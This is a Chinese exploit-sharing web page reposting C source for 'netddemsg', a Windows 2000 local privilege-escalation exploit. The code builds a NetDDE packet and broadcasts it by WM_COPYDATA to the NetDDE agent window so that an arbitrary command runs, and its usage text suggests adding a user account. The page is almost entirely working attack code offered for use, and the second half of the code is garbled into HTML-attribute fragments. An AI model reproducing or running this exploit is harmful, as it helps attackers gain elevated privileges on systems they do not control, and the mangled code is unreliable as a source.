w2k本地溢出netddemsg源码
发布时间:2008-11-20
点击:
来源:本站原创
录入者:佚名
<![CDATA[// netddemsg.cpp : Defines the entry point for the application.
// To link include library nddeapi.lib
#include<windows.h>
#include<stdlib.h>
#include<stdio.h>
#include<nddeapi.h>
char mess[300];
void OutPutString(char *str)
{
printf("%s\r\n",str);
}
void NDDEError(UINT err)
{
char error[256];
NDdeGetErrorString(err,error,256);
OutPutString(error);
// exit(err);
}
void *BuildNetDDEPacket(const char *svShareName, const char* svCmdLine, int *pBufLen)
{
// Build NetDDE message
int cmdlinelen=strlen(svCmdLine);
int funkylen=0x18+strlen(svShareName)+1+cmdlinelen+1;
char *funky=(char *)malloc(funkylen);
if(funky==NULL)
{
OutPutString("Out of memory.");
return NULL;
}
// 0xDDE1DDE1(magic number) 0x00000001 (?) 0x00000001 (?) // ShareModId unused (?)
char magic[0x20]="\xE1\xDD\xE1\xDD\x01\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x09\x00\x00\x00\x01\xCC\xCC\xCC\xCC\x0";
memcpy(funky, magic, 0x18);
memcpy(funky+0x18,svShareName,strlen(svShareName)+1); // Share name
memcpy(funky+0x18+strlen(svShareName)+1,svCmdLine,cmdlinelen+1); // Command line to execute
*pBufLen=funkylen;
return funky;
}
void Usage(char *file)
{
_snprintf(mess, 300, "Syntax is: %s [-s sharename] <\"command line\">\r\n", file);
OutPutString(mess);
_snprintf(mess, 300, "\t if the command line contain BLANK, use \" \" to include it,\r\n \t for ex: %s \"net user xxx xx /add\"\r\n", file);
OutPutString(mess);
OutPutString("\t /? or NO parameter show this.");
exit(0);
}
int main(int argc, char *argv[])
{
// Check command line
int cmdlinelen;
if(argc<=1 || !stricmp(argv[1], "/?"))Usage(argv[0]);
char *lpCmdLine=argv[1];
cmdlinelen=strlen(lpCmdLine);
char *szShare=NULL;
char *szCmdLine;
int cmdNo=1;
if(strncmp(lpCmdLine,"-s",2)==0)
{
if(argc<3)
{
OutPutString("You must specify a share after '-s'!");
return -1;
}
szShare=argv[2];
cmdNo=3;
}
if(argc<cmdno+1) {="" outputstring("you="" must="" specify="" a="" command="" to="" run.");="" return="" -1;="" }="" szcmdline="argv[cmdNo];" get="" netdde="" window="" hwnd="" hwnd="FindWindow("NDDEAgnt","NetDDE" agent");="" if(hwnd="=NULL)" {="" _snprintf(mess,="" 300,="" "couldn't="" find="" netdde="" agent="" window,="" error="" code:%d\r\n",="" getlasterror());="" outputstring(mess);="" return="" -1;="" }="" get="" computer="" name="" dword="" dwsize="256;" char="" svcompname[256];="" getcomputername(svcompname,&dwsize);="" get="" list="" of="" shares="" to="" try="" char="" *sharename,*sharenames;="" if(szshare="=NULL)" {="" try="" all="" shares="" uint="" err;="" dword="" dwnumshares;="" deep="" check="" otgpdvt="" err="NDdeShareEnum(svCompName,0,NULL,0,&dwNumShares,&dwSize);" if(err!="NDDE_NO_ERROR" &&="" err!="NDDE_BUF_TOO_SMALL)NDDEError(err);" sharenames="(char" *)malloc(dwsize);="" err="NDdeShareEnum(svCompName,0,(LPBYTE)sharenames,dwSize,&dwNumShares,&dwSize);" if(err!="NDDE_NO_ERROR)NDDEError(err);" }="" else{="" try="" command="" line="" share="" sharenames="(char" *)malloc(strlen(szshare)+2);="" memset(sharenames,'\0',strlen(szshare)+2);="" strcpy(sharenames,szshare);="" }="" try="" all="" shares="" for(sharename="sharenames;(*sharename)!='\0';" sharename+="(strlen(sharename)+1))" {="" tell="" user="" if(szshare="=NULL)" {="" _snprintf(mess="" ,300="" ,"try="" command="" through="" the="" '%s'="" share?",sharename);="" outputstring(mess);="" }="" get="" netdde="" packet="" void="" *funky;="" int="" funkylen;="" funky="BuildNetDDEPacket(sharename," szcmdline,="" &funkylen);="" if(funky="=NULL)return" -1;="" perform="" copydata="" copydatastruct="" cds;="" cds.cbdata="funkylen;" cds.dwdata="0;" cds.lpdata="(PVOID)funky;" sendmessage(hwnd_broadcast,wm_copydata,(wparam)hwnd,(lparam)&cds);="" break;="" free="" memory="" free(funky);="" }="" free="" memory="" free(sharenames);="" return="" 0;="" }=""></cmdno+1)></nddeapi.h></stdio.h></stdlib.h></windows.h>]]>
 关闭窗口  打印文档 |
账号登录